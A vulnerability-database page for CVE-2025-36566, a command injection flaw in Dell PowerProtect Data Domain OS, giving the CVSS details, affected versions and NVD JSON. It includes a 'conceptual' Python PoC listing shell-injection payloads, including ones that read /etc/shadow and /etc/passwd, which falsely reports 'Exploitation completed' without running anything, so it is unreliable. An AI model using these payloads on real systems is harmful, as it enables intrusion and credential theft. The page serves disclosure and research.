Security Vulnerability Report
中文
CVE-2025-36566 CVSS 6.7 MEDIUM

CVE-2025-36566

Published: 2025-10-07 20:15:34
Last Modified: 2025-10-14 20:08:04
Source: [email protected]

Description

Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.1.0.10, LTS2024 release Versions 7.13.1.0 through 7.13.1.25, LTS 2023 release versions 7.10.1.0 through 7.10.1.50, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to arbitrary command execution. Exploitation may allow privilege escalation to root.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
Dell PowerProtect Data Domain DD OS Feature Release 7.7.1.0 - 8.1.0.10
Dell PowerProtect Data Domain DD OS LTS2024 7.13.1.0 - 7.13.1.25
Dell PowerProtect Data Domain DD OS LTS 2023 7.10.1.0 - 7.10.1.50

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-36566 - Dell PowerProtect Data Domain OS Command Injection PoC # This PoC demonstrates the concept of OS command injection in DD OS # Note: Requires high privileged local access to the DD OS system import subprocess import sys def exploit_dd_os_command_injection(target_input): """ Conceptual PoC for CVE-2025-36566 OS Command Injection The vulnerability exists in DD OS where user-supplied input is passed to system shell commands without proper sanitization. """ # Vulnerable code pattern (pseudo-code representation): # os.system("ddadmin command " + user_input) # Malicious payload example - injecting additional commands via shell metacharacters # The semicolon (;) terminates the original command and starts a new one malicious_payload = target_input + "; id; whoami; cat /etc/shadow" # In a real attack scenario, the attacker would interact with DD OS # through its administrative interface or SSH session print(f"[*] Attempting command injection with payload: {malicious_payload}") # Example of vulnerable command construction: # The DD OS may construct commands like: # /opt/dd/bin/ddadmin <user_input> # Without proper input validation, shell metacharacters are interpreted # Demonstration of command injection techniques: payloads = [ "normal_command; id", # Command chaining with semicolon "normal_command | cat /etc/passwd", # Pipe injection "normal_command `id`", # Backtick command substitution "normal_command $(whoami)", # Dollar-parentheses substitution "normal_command && malicious_command", # AND operator chaining ] for payload in payloads: print(f"[+] Payload: {payload}") # In actual exploitation, this would be sent to the vulnerable DD OS endpoint # subprocess.run(payload, shell=True) # This would execute the injected command return "Exploitation completed - check for root access" if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = "legitimate_admin_command" result = exploit_dd_os_command_injection(target) print(result)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36566", "sourceIdentifier": "[email protected]", "published": "2025-10-07T20:15:33.953", "lastModified": "2025-10-14T20:08:04.330", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.1.0.10, LTS2024 release Versions 7.13.1.0 through 7.13.1.25, LTS 2023 release versions 7.10.1.0 through 7.10.1.50, contain an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to arbitrary command execution. Exploitation may allow privilege escalation to root."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.60", "matchCriteriaId": "F2389C08-162A-4D43-B1EA-D93D7DB51781"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.30", "matchCriteriaId": "5E7EC11C-C065-48D9-A036-5A17653D44EA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0.0", "versionEndExcluding": "8.3.0.10", "matchCriteriaId": "FD518568-542A-420D-B0E6-6F35E127E5CE"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000348708/dsa-2025-159-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.